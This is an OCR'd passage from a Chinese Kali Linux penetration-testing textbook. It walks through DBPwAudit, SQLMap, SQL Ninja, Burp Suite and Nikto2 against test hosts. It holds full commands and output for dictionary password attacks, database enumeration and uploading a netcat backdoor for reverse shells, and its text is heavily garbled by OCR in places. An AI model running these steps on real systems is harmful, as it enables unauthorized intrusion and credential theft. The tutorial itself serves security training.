务 枚 举 、 密 码 审计 ， 以 及 评估 目标 系统 遭受 SQL 注 入 攻击 的 可 能 性 。 
审计 人 员 可 利用 这 些 工具 掌握 前 端的 Web 漏 洞 ， 并 同时 发 现 后 台数 据 库 
的 安全 弱点 。 

如 需 详 细 了 解 SQL 诸如 攻击 及 有 关 类 型 ， 请 参见 http:/ 
hakipedia.com/index.php/SQL Injection ° 

1. DBPwAudit 

DBPwAudit & — 3X Rf iT Oracle ` MySQL ` MS-SQL 和 IBM DB2 服 
务 器 密码 安全 性 的 工具 ， 它 是 Java 程 序 。 这 款 工具 大 幅度 地 简化 了 使 用 
新 数据 库 (评估 ) 技术 的 难度 。 在 目标 系统 没有 采用 强 密码 安全 策略 
的 情况 下 ， 它 可 帮助 渗透 测试 人 员 找 到 数据 库 管 理 系统 的 有 效 账户 。 
目前 ， 它 文 持 字典 式 密 码 攻击 机 制 。 

如 需 启动 DBPwAudit 程序 ， 可 在 桌面 菜单 里 依次 选中 Kali Linux | 
Vulnerability Analysis | Database Assessment | dbpwaudit， 或 者 在 shell 中 
使 用 下 述 指令 。 

# cd /usr/share/dbpwaudit/ 

# dbpwaudit 


上 述 指 令 将 在 屏幕 上 显示 程序 的 所 有 选项 及 使 用 说 明 。 如 需 知道 
DBPwAudit 可 以 张 动 的 数据 库 类 型 ， 可 使 用 下 述 指令 。 

# dbpwaudit -L 

上 述 指 令 将 列 出 该 程序 可 以 审计 的 数据 库 类 型 。 特 别 要 注意 数据 
库 系 统 的 别名 (aliases) ， 在 命令 行 中 指定 数据 库 类 型 时 要 使 用 数据 库 
的 别名 ° 

本 文 将 演示 该 程序 审计 MySQL 数 据 的 方法 。 在 此 之 前 ， 我 们 首先 
要 安 闭 好 MySQL 驱 动 程序 。 在 安装 好 MySQL 驱 动 程序 之 后 ， 我 们 可 测 
斌 目标 数据 库 系统 是 否 台 有 铺 见 账户 。 在 进行 字典 式 测试 之 前 ， 我 们 
需要 提前 准备 好 两 个 字典 文件 ， 即 users.txt 和 passwwords.txt。 然 后 使 用 
下 述 指令 。 

# dbpwaudit -s 10.2.251.24 -d pokeronline -D MySQL -U \ users.txt —P 


passwords.txt 

DBPwAwudit v0.8 by Patrik Karlsson <patrik@cqure.net> 

[Tue Sep 14 17:55:41 UTC 2013] Starting password audit ... 

[Tue Sep 14 17:55:41 UTC 2013] Testing user: root, pass: admin123 

[Tue Sep 14 17:55:41 UTC 2013] Testing user: pokertab, pass: 
admin123 

ERROR: message: Access denied for user 'root'@'10.2.206.18' (using 
password: Y ES), code: 1045 

[Tue Sep 14 17:55:50 UTC 2013] Testing user: root, pass: RolVer123 

ERROR: message: Access denied for user 'pokertab'@'10.2.206.18' 
(using password: YES), code: 1045 

[Tue Sep 14 17:55:56 UTC 2013] Testing user: pokertab, pass: 
RolVer123 


[Tue Sep 14 17:56:51 UTC 2013] Finnishing password audit ... 

Results for password scan against 10.2.251.24 using provider MySQL 

user: pokertab pass: RolVer123 

Tested 12 passwords in 69.823 seconds (0.17186314tries/sec) 

上 面 信 息 表 明 ， 该 程序 成 功 地 发 现 了 一 个 有 效 的 用 户 账 户 。 上 壕 

QP, -d 选项 代表 目标 数据 库 的 名 称 ，-D 选项 用 于 指定 相应 的 数据 

库 管理 系统 (DBMS) ° -U 选项 指定 用 户 名 字典 ，-P 选 项 则 用 来 指定 
采用 的 密码 字典 。 

2. SQLMap 

SQLMap 是 一 款 先 进 的 上 自动 执行 SQL 注 入 的 审计 工具 。 针 对 指定 的 
URL， 它 可 以 扫 摘 、 发 现 并 利用 SQL 注 入 漏洞 。 目 前 ，SQLMap 文 持 的 
数据 库 管理 系统 包括 MS-SQL、MySQL、Oracle 和 PostgreSQL。 略微 处 
理 之 后 ， 它 也 能 够 识别 诸如 DB2、Informix、Sybase、Interbase 和 MS 
Access 之 类 的 数据 库 系 统 。SQLMap 采用 4 种 独特 的 SQL 注入 技术 ， 
分 别 是 SQL 盲 注 、 联 合 查 询 SQL 注 入 、 畦 加 式 注入 (stacked query) 和 
基于 时 间 的 SQL 宦 注入 。 它 功能 广泛 ， 可 对 数据 库 进 行 指纹 识别 、 服 
务 枚 举 、 数 据 提 取 ， 并 可 访问 目标 主机 的 文件 系统 ， 在 获取 完全 操作 
权时 甚至 可 以 执行 任意 命令 。 此 外 ， 该 工具 还 可 以 从 Burp Proxy 或 Web 
Scarab 的 日 志 ， 以 及 标准 的 文本 文件 中 解析 测试 目标 的 列表 。 它 还 能 够 
调用 Google dorks 的 分 类 数据 ， 使 用 Google 搜 索引 擎 搜索 指定 目标 的 可 
测试 网 址 。 

如 需 深 入 了 解 Google dorks 的 各 种 用 法 ， 请 访问 Google 
HackingDatabase 的 官方 网 址 : http://www.hackersforcharity.org/ghdb/ ° 

如 需 启 动 SQLMap 程序 ， 可 在 桌面 菜单 里 依次 选中 Kali Linux | 
Vulnerability Analysis Database Assessment | sqlmap ， 或 者 在 shell 中 使 用 
下 述 指令 。 


# cd /usr/share/sqlmap/ 

# sqlmap -h 

上 述 命 令 将 显示 所 有 可 用 的 选项 。 这 些 选 项 可 以 分 为 11 个 逻辑 分 
类 ， 即 日 标 规格 、 连 接 请 求 参 数 、 注 入 payload、 注 入 技术 、 指 纹 识 
别 、 枚 举 选 项 、 用 户 自 定 义 函 数 (UDF) 注入 、 文 件 系 统 访问 选项 、 
操作 系统 访问 选项 、Windows 注册 表 访 问 和 其 他 杂项 。 在 下 文 的 这 个 
例子 中 ， 我 们 将 使 用 多 个 指纹 识别 类 选项 和 服务 枚 举 类 选项 ， 获 取 被 
测 数据 库 系 统 的 特征 信息 。 

# sqlmap -u "http://testphp.example.com/artists.php?artist=2" -p 


"artist"-f -b --current-user --current-db --dbs --users 


[*] starting at: 11:21:43 

[11:21:43] [INFO] using 
"/usr/share/sqlmap/output/testphp.example.com/session' as session file 

[11:21:43] [INFO] testing connection to the target url 

[11:21:45] [INFO] testing if the url is stable, wait a few seconds 

[11:21:49] [INFO] url is stable 

[11:21:49] [INFO] testing sql injection on GET parameter 'artist' with 0 
parenthesis 

[11:21:49] [INFO] testing unescaped numeric injection on GET 
parameter 'artist' 

[11:21:51] [INFO] confirming unescaped numeric injection on GET 
parameter 'artist' 

[11:21:53] [INFO] GET parameter 'artist is unescaped numeric 
injectable with 0 parenthesis 

[11:21:53] [INFO] testing for parenthesis on injectable parameter 

[11:21:56] [INFO] the injectable parameter requires 0 parenthesis 


[11:21:56] [INFO] testing MySQL 

[11:21:57] [INFO] confirming MySQL 

[11:21:59] [INFO] retrieved: 2 

[11:22:11] [INFO] the back-end DBMS is MySQL 

[11:22:11] [INFO] fetching banner 

[11:22:11] [INFO] retrieved: 5.0.22-Debian Oubuntu6.06.6-log 

[11:27:36] [INFO] the back-end DBMS operating system is Linux 
Debian or Ubuntu 


[11:28:00] [INFO] executing MySQL comment injection fingerprint 
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or 
Dapper Drake) 
web application technology: Apache 2.0.55, PHP 5.1.2 
back-end DBMS operating system: Linux Debian or Ubuntu 
back-end DBMS: active fingerprint: MySQL >= 5.0.11 and < 5.0.38 
comment injection fingerprint: MySQL 5.0.22 
banner parsing fingerprint: MySQL 5.0.22, logging enabled 
html error message fingerprint: MySQL 
[11:31:49] [INFO] fetching banner 
[11:31:49] [INFO] the back-end DBMS operating system is Linux 
Debian or Ubuntu 
banner: '5.0.22-Debian Oubuntu6.06.6-log' 
[11:31:49] [INFO] fetching current user 
[11:31:49] [INFO] retrieved: fanart@localhost 
current user: 'fanart@localhost' 
[11:34:47] [INFO] fetching current database 
[11:34:47] [INFO] retrieved: fanart 


current database: 'fanart' 

[11:35:57] [INFO] fetching database users 

[11:35:57] [INFO] fetching number of database users 
[11:35:57] [INFO] retrieved: 1 

[11:36:04] [INFO] retrieved: 'fanart'@'localhost' 
database management system users [1]: 

[*] 'fanart'@'localhost' 

[11:39:56] [INFO] fetching database names 
[11:39:56] [INFO] fetching number of databases 
[11:39:56] [INFO] retrieved: 3 

[11:40:05] [INFO] retrieved: information schema 
[11:43:18] [INFO] retrieved: fanart 

[11:44:24] [INFO] retrieved: modrewriteShop 
available databases [3]: 

[*] fanart 

[*] information schema 

[*] modrewriteShop 

[11:47:05] [INFO] Fetched data logged to text files under 


"/usr/share/sqlmap/output/testphp.example.com' 


这 一 时 刻 ， 我 们 成 功 地 发 现 了 artist 参 数 存 在 注入 问题 。 上 述 指 令 
中 ，-p 选 项 用 来 指定 目标 URL 里 需要 测试 的 参数 。 默 认 情 况 下 ， 
SQLMap 会 扫描 所 有 可 用 的 参数 (GET ^ POST ^ HTTPCookie fil User- 
Agent) ， 但 是 我 们 通过 指定 参数 (-p"Parameter 1, Parameter 2") 限制 
了 测试 对 象 的 范围 。 这 将 提升 SQL 注入 的 速度 ， 从 而 提高 访问 后 台数 
据 库 的 速度 。 在 下 面 的 测试 中 ， 我 们 使 用 --tables 选 项 和 -D 选 项 ， 从 数 
据 库 fanart 中 提取 所 有 表 的 信息 。 


# sqlmap -u "http://testphp.example.com/artists.php?artist-2" --tables - 
D fanart -v 0 

[*] starting at: 12:03:53 

web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or 
Dapper Drake) 

web application technology: Apache 2.0.55, PHP 5.1.2 

back-end DBMS: MySQL 5 

Database: fanart 

[7 tables] 


| artists | 

| carts | 

| categ | 
| featured | 

| guestbook | 
| pictures | 


| users | 


上 述 信 息 表 明 ， 由 于 两 次 测试 都 使 用 了 相同 的 URL, SQLMap f£ 
序 使 用 了 上 次 会 话 (sesion) 中 提取 的 指纹 信息 ， 并 没有 从 头 对 数据 
ae 这 种 功能 可 让 用 户 随时 终止 并 保存 测试 会 话 以 便 在 后 
续 阶 段 继 续 此 次 会 话 。 此 处 ， 我 们 还 可 以 使 用 --dump 或 --dump all 选 
项 ， 对 数据 库 信 息 进行 自动 存储 。 这 个 程序 还 有 其 他 一 些 高 级 选项 ， 
例如 --os-cmd、--os-shell 或 --os-pw 用 于 可 帮助 渗透 测试 者 获得 远程 访 
问 系统 权限 ， 并 执行 任意 命令 。 但 是 ， 此 类 功能 仅 文 持 MS-SQL ^ 
MySQL 和 PostgreSQL 这 三 种 运行 于 操作 系统 的 数据 库 系统 。 如 果 还 需 


要 使 用 SQLMap 的 其 他 选项 ， 可 参考 官方 教程 中 的 实例 : http://sqlmap. 
sourceforge.net/doc/ README.html ° 

MetasploitHE 28 nf LA X 5SQLMapB WD ewe Ii? 

SQLMap H} --ospwn 7 Jil ` --os-smbrelay 35 Jil ^ --priv-sec 32 I Fil -- 
msf-path 选 项 ， 都 是 在 数据 库 系 统 的 操作 系统 上 执行 的 指令 选项 。 
Metasploit 可 通过 三 种 payload 使 用 这 些 选 项 : shell、 交 互 式 命令 环境 和 
GUI 访问 (VNC) 

3. SQL Ninja 

SQL Ninja 是 一 款 SQL 注入 的 审计 工具 ， 专 门 用 于 评估 后 台数 据 库 
采用 MS-SQL Server 的 Web 应 用 程序 。 它 可 通过 SQL 注入 漏洞 获取 远程 
数据 库 服 务 絮 的 shell 运 行 权 限 ， 而 不 是 提取 数据 库 数据 的 工具 。SQL 
Ninja 的 功能 有 : 对 服务 器 进行 指纹 识别 、 雄 力 破 解密 码 、 提 升 权 限 、 
上 传 后 门 、 直 接 调用 shell、 反 连 方法 连接 shell ( 绕 过 防火 墙 的 技术 ) ^ 
反射 shell、DNS 隧 道 、 单 命令 执行 等 。 它 还 可 以 与 Metasploit 进 行 集 
成 。 因此， 它 不 仅 是 扫描 SQL 注 入 漏洞 的 工具 ， 而 且 还 是 利用 已 知 漏 
洞 获 取 操 作 系 统 访问 权限 的 工具 。 

SQL Ninja 不 是 初学 者 玩 的 玩具 。 如 采 您 需要 配置 并 使 用 这 种 工 
具 ， 请 详细 阅读 作者 的 使 用 说 明 ， 在 实际 应 用 前 充分 了 解 这 和 于 工具 。 

如 需 启 动 SQL Ninja， 可 在 桌面 菜单 里 依次 选中 Kali Linux | 
Vulnerability Analysis [Database Assessment | sqlninja， 或 者 在 shell 中 使 
用 下 述 指令 。 

# sqlninja 

上 述 指 令 将 在 屏幕 上 显示 程序 所 有 的 可 用 选项 。 在 进行 测试 前 ， 
需要 根据 已 反映 目标 的 情况 更 改 配置 文件 的 参数 和 利用 漏洞 的 选项 。 
首先 ， 您 要 将 样本 配置 文件 解压 缩 出 来 ， 把 它 重 新 命名 ， 然 后 移动 到 
正确 的 目 未 中， 进行 如 下 修改 。 

# cd /usr/share/doc/sqlninja/ 


# gzip —d sqlninja.conf.example.gz 

# cp sqlninja.conf.example.gz /usr/share/sqlninja/sqlninja.conf 

然后 ， 我 们 要 修改 配置 文件 ， 使 其 符合 我 们 的 测试 内 容 。 您 需要 
在 配置 文件 中 找到 下 述 内 容 ， 然 后 删除 行 目 的 注释 符号 ， 并 根据 实际 
情况 对 有 头 选项 进行 调整 。 

本 文 根 据 情 况 将 配置 文件 的 下 述 内 容 进行 了 调整 。 


# vim sqlninja.conf 


# Host (required) 

host = testasp.example.com 

# Port (optional, default: 80) 

port = 80 

# Vulnerable page (e.g.: /dir/target.asp) 

page = /showforum.asp 

stringstart = id=0; 

# Local host: your IP address (for backscan and revshell modes) 

Ihost = 192.168.0.3 

msfpath = /usr/share/exploits/framework3 

# Name of the procedure to use/create to launch commands. Default is 

# "xp cmdshell". If set to "NULL", openrowset+sp_oacreate will be 
used 

# for each command 


xp name = xp cmdshell 


在 上 述 配置 文件 中 ， 我 们 仅 修改 了 一 些 必 要 的 参数 ， 其 他 没有 近 
及 的 内 容 均 采 用 了 移 认 值 。 另 外 ， 在 使 用 SQL Ninja 之 前 ， 您 还 有 必要 


使 用 其 他 工具 检查 SQL EAM di] ^ TEAC ACE OC US. fastu] 
以 使 用 它 的 攻击 模式 -m ttest 对 目标 进行 检测 。 

# sqlninja -m t 

Sqlninja rel. 0.2.3 

Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net> 

[+] Parsing configuration file................ 

[+] Target is: testasp.targetdomain.com 

[+] Trying to inject a 'waitfor delay’.... 


[+] Injection was successful! Let's rock !! :) 


可 见 ， 程 序 成 功 地 识别 出 了 配置 文件 的 各 种 设置 ， 而 且 盲 注 测试 
取得 了 成 功 。 接 下 来 ， 我们 可 以 对 目标 进行 指纹 识别 ， 以 获取 
SQLServer 的 更 多 信息 ， 并 取得 目标 操作 系统 的 操作 权限 。 

# Sqlninja -m f 

Sqlninja rel. 0.2.3 

Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net> 

[+] Parsing configuration file................ 

[+] Target is: testasp.example.com 

What do you want to discover ? 

0 - Database version (2000/2005) 

1 - Database user 

2 - Database user rights 

3 - Whether xp. cmdshell is working 

4 - Whether mixed or Windows-only authentication is used 
a - All of the above 

h - Print this menu 


q - exit 


>a 

[+] Checking SQL Server version... 
Target: Microsoft SQL Server 2005 

[+] Checking whether we are sysadmin... 
No, we are not 'sa'.... :/ 

[+] Finding dbuser length... 
Got it ! Length = 8 

[+] Now going for the characters........ 
DB User is....: achcMiU9 

[+] Checking whether user is member of sysadmin server role.... 
You are an administrator ! 

[+] Checking whether xp. cmdshell is available 
xp. cmdshell seems to be available :) 


Mixed authentication seems to be used 


>q 


上 述 信 息 表 明 ， 目 标 系统 存在 漏洞 ， 其 指定 的 数据 库 安 全 策略 并 
不 够 安全 。 我 们 有 机 会 上 传 NetCat 的 后 门 程序 ， 继 而 获取 被 攻陷 主机 的 
长 期 控制 权 ， 并 可 通过 它 的 shell 执 行 任意 的 指令 。 此 时 ， 和 人们 常用 
Metasploit 的 攻击 模式 进行 进一步 的 沙 透 。 

# sqininja -m u 

Sqlninja rel. 0.2.3 

Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net> 

[+] Parsing configuration file................ 

[+] Target is: testasp.targetdomain.com 

File to upload: 


shortcuts: 1=scripts/nc.scr 2=scripts/dnstun.scr 


21 

[+] Uploading scripts/nc.scr debug script............ 

1540/1540 lines written 

done ! 

[+] Converting script to executable... might take a while 

[+] Completed: nc.exe is uploaded and available ! 

至 此 ， 我 们 已 经 成 功 上 传 后 门 。 然 后 我 们 可 通过 该 后 门 获 得 
s/dirshell、k/backscan 或 r/revshell。 此 外 ， 采 用 m/metasploit 的 高 级 选项 
可 以 使 用 Metasploit 框架 的 SQLNinja 封 装 程序 访问 目标 主机 的 GUI。 如 
需 详 细 了 解 SQLNinja 的 使 用 方法 或 它 的 配置 文件 ， 请 访问 


http://sqlninja.source forge.net/sqlninja-howto.html ° 
7.8.2 Web 应 用 程序 评估 工 


本 市 介绍 的 工具 主要 关注 Web 基 础 设施 前 端 程序 的 安全 性 。 它 们 都 
可 以 识别 、 分 析 并 利用 应 用 程序 的 安全 漏洞 。 这 些 漏洞 包括 缓冲 区 汶 
出 、 跨 站 脚本 (XSS) ^ SQL 注入 、SSI 注 入 、XML 注 入 、 应 用 配置 
间 误 、 功 能 滥用 、 会 话 预 测 、 信 息 泄 露 以 及 许多 其 他 类 型 的 漏洞 。7.2 
节 已 经 讨论 过 ， 应 用 程序 漏洞 有 多 种 分 类 标准 。 如 需 更 深入 了 解 这 些 
漏 酒 的 特性 ， 强 烈 建议 读者 掌握 上 述 漏 洞 分 类 标准 。 

1. Burp Suite 

Burp Suite 组 合 了 一 系列 功能 强大 的 Web 应 用 程序 的 安全 工具 。 这 
些 工 具 能 够 演示 攻击 人 员 对 Web 应 用 程序 的 渗透 方法 。 它 们 能 够 或 手动 
或 自动 地 扫描 、 分 析 并 利用 Web 应 用 程序 的 安全 漏洞 。Burp Suit 将 有 关 
工具 整合 为 一 体 ， 能 够 在 多 个 工具 之 间 传 递 和 共享 信息 ， 成 为 了 一 个 
完整 的 攻击 平台 。 这 一 特性 使 得 Burp Suite 成 为 了 简单 有 效 的 Web 应 用 
程序 攻击 框架 。 


如 需 启动 Burp Suit, WE E K 2 EKA F Kali Linux | Web 
Applications | Web Vulnerability Scanners | burpsuite ， 或 在 终端 中 使 用 下 
述 指 令 。 

# burpsuite 

上 述 指 令 将 在 屏幕 上 显示 Burp Suite 的 程序 窗口 。 您 可 以 通过 对 应 
的 选项 卡 访问 它 所 集成 的 全 部 工具 (Target ^ Proxy ^ Spider ^ Scanner ` 
Intruder、Repeater、Sequencer、Decoder 和 Comparer) 。 如 需 了 解 它们 
的 用 法 和 配置 等 详细 信息 ， 可 以 使 用 Hep 荣 单 或 者 访问 
http://www. portswigger.net/suite/help.html ° AS fyi) (5 FA Burp Suite 的 多 个 
工具 分 析 小 型 的 Web 应 用 程序 。 要 注意 ，Burp Suite 有 两 个 版 本 : 免费 
版 和 商业 版 > Kali Linux 收录 的 版 本 是 它 的 免费 版 ， 因 此 有 些 功 能 受到 
限制 。 使 用 Burp Suite 检查 SQL 注入 漏洞 的 相应 步骤 如 下 。 

1. 首先 ， 选 择 Proxy | Options, proxy listeners 的 属性 。 本 例 采 
用 程序 的 默认 设置 ， 即 监听 8080 端口 。 您 还 可 以 根据 评估 任务 的 实际 
情况 设置 这 个 界面 的 其 他 选项 ， 例 如 主机 重 定 癌 、SSL 证 书 、 客 户 端 请 
求 拦截 、 服 务 需 啊 应 拦截 、 页 面 属性 和 请 求 头 修改 等 。 

2. 选择 Proxy | Intercept， 选 中 intercept is on 标签 。 

3. 打开 你 最 习惯 的 浏览 器 (例如 Firefox) ， 并 设置 HITP/HTTPS 
协议 的 代理 服务 器 为 本 地 代理 (127.0.0.1, 8080) 。 代 理 服务 器 能 够 拦 
截 、 检 查 并 修改 浏览 器 发 往 目 标 Web 应 用 程序 之 间 的 客户 端 请求， 并 且 
能 够 记录 服务 颖 发 回 的 所 有 啊 应 。 在 这 种 设置 中 ，Burp Suite 的 功能 类 
似 中 间 人 代理 服务 妖 。 

4. 浏览 目标 网 站 (例如 ，http: //testphp.targetdomain.com) ， 您 可 
在 Burp Suite 的 Proxy | IPntercept 选 项 卡 中 看 到 浏 贤 磺 发 送 的 请 求 数据 

(http request) 。 在 本 例 中 ， 我 们 不 对 浏览 器 请 求 进行 任何 修改 ， 直 接 
转发 这 个 请 求 。 如 需 修 改 请 求 ， 可 以 在 Raw、Headers 或 者 Hex 选 项 卡 中 


修改 。 清 注意 ， 在 访问 索引 页 (index) 等 网 页 时 ， 浏 览 器 会 对 网 页 中 
的 各 种 资源 〈 例 如 图 像 、Flash 文 件 ) 发 送 单独 的 获取 请 求 。 

5. 在 此 ， 强 烈 建议 访问 尽 可 能 多 的 网 页 ， 以 帮助 Burp Suite 列 出 可 
用 页 的 GET 和 POST 请 求 。 当 然 ， 也 可 以 使 用 程序 的 Spider 功能 自动 完 
成 分 析 过 程 。 如 需 使 用 Spider 的 爬虫 功能 ， 可 在 荣 单 中 选中 Target | 
Site Map ， 右 键 点 击 目标 网 址 〈 本 例 是 http:Wtestphp.examples.com) , 
然后 选择 spider this host。 此 后 ， 程 序 将 会 自动 发 现 、 扫 描 可 用 页 面 ; 
当 遇 到 需要 递交 数据 的 页 面 (例如 登录 ) 时 ， 程 序 将 提示 您 进行 人 工 
于 预 。 此 操作 结束 后 ， 可 在 Target | Site map 选 项 卡 右 侧 的 面板 中 查看 
可 访问 网 页 清单 和 页 面 属 性 〈 方 法 、URL、 参 数 、 响 应 码 等 ) 

6. 您 可 选择 一 个 采用 GET 或 POST 模式 传递 参数 的 页 面 ， 用 Intruder 
进行 测试 。 天 键 是 要 找到 可 能 的 参数 标识 从 ， 获 取 有 用 数据 ， 并 对 这 
些 参 数 进行 模糊 测试 ， 以 检测 已 知 漏洞 。 右 键 单 击 选 定 的 请 求 ， 并 选 
择 send to intruder ° A 例 测 试 的 网 ik 有 是 
http://testphp.targetdomain.com/listproducts. php?artist=2; 程序 将 以 不 同 
长 度 的 字符 替代 2， 以 找到 已 知 的 漏洞 。 

7. 接 下 来 ， 我 们 要 指定 攻击 类 型 以 及 有 效 载 集 (payload) 的 位 置 

(Intruder | Positions) ， 以 进行 自动 测试 。 有 效 载荷 的 位 置 有 828 标 
识 。 然 后 ， 我 们 通过 有 琳 单 进入 Intruder | Payloads， 从 预定 义 字 符 块 列表 
中 选择 预定 义 的 有 效 载荷 (payload) ， 本 例 选 择 Character blocks。 当 
然 ， 您 还 可 以 指定 目 定 义 的 有 效 载 何 。 设 置 完毕 后 ， 选 择 瑟 单 Intruder | 
Start 执行 测试 任务 。 此 时 ， 程 序 将 会 在 弹出 的 窗口 里 显示 测试 目标 应 
用 程序 时 发 送 的 全 部 请 求 。 答 程序 处 理 完 所 有 指定 的 有 效 载 集 之 后 ， 
我 们 可 通过 远程 啊 应 的 比较 结果 判断 Web 应 用 程序 的 意外 行为 。 使 用 鼠 
标 右 键 点 击 选 定 的 请 求 并 选择 send response to comparer， 即 可 对 响应 进 
行 比较 。Burp Suite 可 以 对 两 个 (或 更 多 ) 的 请 求 或 响应 进行 逐 字 逐 节 

(bytes 和 words) 的 比较 。 如 需 详 细 了 解 各 种 攻击 类 型 ， 请 访问 


http://www.portswigger.net/burp/help/intruder positions. html#attacktype; 
AU We [RAK AMR du xe Du By Ree og. G8 uw 
http://www.portswigger.net/burp/help/ intruder payloads types.html ° 

8. TELL BCH SZ Bas EE FP. Fe] A SE aT TOR EE 
SQL 注入 漏洞 。 为 了 验证 其 真实 性 ， 我 们 诀 定 使 用 Repeater 重 现 该 请 
求 。 即 使 用 鼠标 右键 点 击 该 请 求 ， 然 后 选择 send request to repeater, Z 
后 单 击 Repeater 选项 卡 中 的 go 按钮 ， 将 会 立即 获取 指定 请 求 的 远程 啊 
应 。 在 本 例 中 ， 我 们 注意 到 响应 页 面 中 的 下 述 错 误 信息 。 

Error: Unknown column 
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAA AAAAAAAAAAAAAAAAAA' in 'where clause’ 


Warning : mysql fetch array(): supplied argument is not a valid 


MySQL result resource in 
/var/www/vhosts/default/htdocs/listproducts.php on line 74 
9. 上 述 信息 是 SQL 注入 漏洞 的 典型 特征 。 除 了 检验 这 种 类 型 的 安 
全 问题 ， 我 们 还 可 以 使 用 Burp Suite 的 sequencer 测试 应 用 程序 session 
tokens 的 散 化 程度 ， 检 测 session 的 可 预测 问题 。 有 关 sequencer 的 基本 用 
ik, NP Whttp://www.portswigger. net/suite/sequencerhelp.html ° 
Burp Suite 是 款 多 功能 的 Web 应 用 程序 安全 工具 。 它 是 应 用 广泛 、 
功能 强大 的 Web 应 用 程序 攻击 平台 。 篇 幅 所 限 ， 本 文 不 逐一 介绍 它 的 各 
个 功能 。 所 以 ,我 们 强烈 建议 您 通过 它 的 官方 网 站 
(http://www.portswigger.net/) 详细 了 解 它 的 各 种 用 法 。 
2. Nikto2 
Nikto2 是 一 款 基础 的 web 服务器 安全 扫描 工具 。 它 可 以 扫描 、 检 测 
由 下 述 问 题 引 起 的 的 安全 漏洞 : 服务 器 的 配置 不 当 问题 、 默 认 和 不 安 
全 的 文件 、 过 旧 的 服务 端 应 用 程序 。Nikto2 程 序 完全 是 LibWhisker2 的 
再 开发 版 。 因 此 ， 它 文 持 跨 平台 部 署 、SSL、 常 见 的 主机 号 份 验证 方式 


(NTLM/Basic) 、 多 代理 ， 并 采用 了 多 种 IDS 规避 技术 。 它 还 文 持 子 
域名 枚 举 、 应 用 程序 安全 检查 (XSS、SQL 注 入 等 ) ， 并 能 够 使 用 字典 
的 攻击 方法 猜测 认证 信息 。 

如 需 启动 Niklo2 程序 ， 可 在 桌面 菜单 里 依次 选中 Kali Linux | Web 


Applications | Web Vulnerability Scanners | nikto， 或 者 在 终端 中 使 用 下 述 
指令 。 


# nikto 

上 述 指 令 将 显示 其 所 有 选项 及 其 扩展 特性 。 在 本 例 中 ， 我 们 使 用 - 
T 选 项 对 目标 主机 执行 一 组 特定 的 测试 。 有 关 各 个 选项 的 详细 说 明和 使 
用 方法 ， 请 访问 http://cirt.net/nikto2-docs/。 

# nikto -h testphp.example.com -p 80 -T 3478b -t 3 -D \ V -0 webtest — 


F 
htm 
- Nikto v2.1.5 
V:Sat Sep 18 14:39:37 2013  - Initialising plugin 


nikto apache expect xss 
V:Sat Sep 18 14:39:37 2013 - Loaded "Apache Expect XSS" plugin. 
V:Sat Sep 18 14:39:37 2013 - Initialising plugin nikto apacheusers 
V:Sat Sep 18 14:39:37 2013 - Loaded "Apache Users" plugin. 
V:Sat Sep 18 14:39:37 2013 - Initialising plugin nikto cgi 
V:Sat Sep 18 14:39:37 2013 - Loaded "CGI" plugin. 
V:Sat Sep 18 14:39:37 2013 - Initialising plugin nikto core 
V:Sat Sep 18 14:39:37  Á 2013  - Initialising plugin 


nikto dictionary. attack 


V:Sat Sep 18 14:39:38 2013 - Checking for HTTP on port 
10.2.87.158:80, using HEAD 

V:Sat Sep 18 14:39:38 2013 - Opening reports 

V:Sat Sep 18 14:39:38 2013 - Opening report for "Report as HTML" 
plugin 

* Target IP: 10.2.87.158 

+ Target Hostname:  testphp.example.com 

+ Target Port: 80 

+ Start Time: 2013-09-19 14:39:38 


+ Server: Apache/2.0.55 (Ubuntu) mod python/3.1.4 Python/2.4.3 
PHP/5.1.2 mod ssl/2.0.55 OpenSSL/0.9.8a mod_perl/2.0.2 Perl/v5.8.7 

V:Sat Sep 18 14:39:40 2013 - 21 server checks loaded 

V:Sat Sep 18 14:39:41 2013 - Testing error for file: /.g89xvY XD 


* OSVDB-877: HTTP TRACE method is active, suggesting the host is 
vulnerable to XST 

V:Sat Sep 18 14:40:49 2013 - Running scan for "Server Messages" 
plugin 

+ OSVDB-0: mod ssl/2.0.55 OpenSSL/0.9.8a mod perl/2.0.2 
Perl/v5.8.7 -mod ssl 2.8.7 and lower are vulnerable to a remote buffer 
overflow which may allow a remote shell (difficult to exploit). 
http://cve.mitre.org/cgi-bin/cvename.cgi?name= CVE-2002-0082, OSVDB- 
756. 


V:Sat Sep 18 14:41:04 2013 - 404 for GET: /tiki/tiki-install.php 


V:Sat Sep 18 14:41:05 2013 - 404 for 
GET: /scripts/samples/details.idc 

* 21 items checked: 15 item(s) reported on remote host 

* End Time: 2013-09-19 14:41:05 (87 seconds) 

* 1 host(s) tested 

V:Sat Sep 18 14:41:05 2013 + 135 requests made 

ERHO F, -TAMEME Information Disclosure (信息 
WEER) ^ Injection (XSS/Script/HTML) ^ Remote File Retrieval (Server 
Wide) ^ Command Execution 和 Software Identification (软件 识别 ) ; -t 
选项 控制 每 个 测试 类 型 执行 的 超时 时 间 : -DV 选项 控制 显示 格式 ; -o 
和 -F 选 项 用 于 定义 扫描 报告 以 特定 的 格式 和 编写 。 Nikto 还 有 其 他 的 选 
项 ， 例 如 -mnutate (猜测 子 域 、 文 件 、 目 录 、 用 户 名 ) 、-evasion (规避 
IDS 检 测 ) 和 -Single ( 单 组 规则 测试 模式 ) ， 都 可 以 用 来 进行 更 为 深入 
的 安全 评估 。 

3. Paros Proxy 

Paros Proxy 是 一 球 名 不 见 经 传 的 深入 分 析 安 全 漏洞 的 评估 工具 。 
它 能 以 礁 虫 方式 分 析 整 个 网 站 的 网 址 ， 并 执行 各 种 漏洞 测试 。 同 时 ， 
审计 人 员 还 可 以 利用 它 的 代理 服务 句 功 能 拦截 本 机 浏 咒 絮 和 目标 应 用 
程序 服务 器 之 间 的 Web 流 量 (支持 HTTP/HTTPS 协 议 ) 。 审 计 人 员 可 以 
利用 这 种 机 制 修改 本 机 发 往 目 标 服 务 程序 的 特定 请 求 ， 从 而 进行 手工 
测试 。 因 此 ， Paros Proxy 不 仅 是 web 应 用 程序 安全 评估 的 主动 评估 工 
具 ， 而 且 还 是 它 的 被 动 评估 工具 。 

如 需 启 动 Paros Proxy 程 序 ， 可 在 桌面 菜单 里 依次 选中 Kali Linux | 
